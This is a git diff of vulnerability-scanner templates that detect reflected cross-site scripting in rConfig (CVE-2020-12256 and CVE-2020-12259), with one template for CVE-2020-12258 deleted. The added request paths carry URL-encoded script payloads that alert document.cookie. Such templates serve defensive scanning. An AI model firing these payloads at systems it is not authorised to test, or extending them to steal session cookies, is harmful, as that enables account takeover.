diff --git a/cves/2020/CVE-2020-12256.yaml b/cves/2020/CVE-2020-12256.yaml
index 2387a01575..a95e8d7a5b 100644
--- a/cves/2020/CVE-2020-12256.yaml
+++ b/cves/2020/CVE-2020-12256.yaml
@@ -10,7 +10,7 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/devicemgmt.php?deviceId=">'
+ - '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
@@ -19,8 +19,12 @@ requests:
words:
- ""
part: body
- condition: and
- type: status
status:
- 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-12258.yaml b/cves/2020/CVE-2020-12258.yaml
deleted file mode 100644
index 7b0a9099b8..0000000000
--- a/cves/2020/CVE-2020-12258.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2020-12258
-
-info:
- name: rConfig 3.9.4 XSS
- author: pikpikcu
- severity: medium
- reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12258
- tags: cve,cve2020,rconfig,xss
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/configDevice.php?rid=">'
-
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - ''
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/cves/2020/CVE-2020-12259.yaml b/cves/2020/CVE-2020-12259.yaml
index f85d3541d9..ea4c5907cd 100644
--- a/cves/2020/CVE-2020-12259.yaml
+++ b/cves/2020/CVE-2020-12259.yaml
@@ -10,7 +10,7 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/configDevice.php?rid=">'
+ - '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
@@ -19,8 +19,12 @@ requests:
words:
- ""
part: body
- condition: and
- type: status
status:
- 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"